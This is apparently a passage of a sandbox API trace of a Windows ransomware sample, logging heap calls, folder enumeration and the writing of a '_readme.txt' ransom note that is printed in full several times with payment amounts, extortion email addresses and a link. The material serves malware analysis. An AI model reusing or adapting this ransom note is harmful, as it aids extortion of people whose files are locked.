[0184.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.118] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0184.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.118] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.118] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.118] PathFindFileNameW (pszPath="") returned="" [0184.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.118] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.119] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0184.119] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0184.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.119] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.119] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0184.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.119] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0184.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.119] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.119] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.120] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.121] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*" (normalized: "c:\\boot\\ja-jp\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.124] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.124] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.124] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.124] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.125] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: 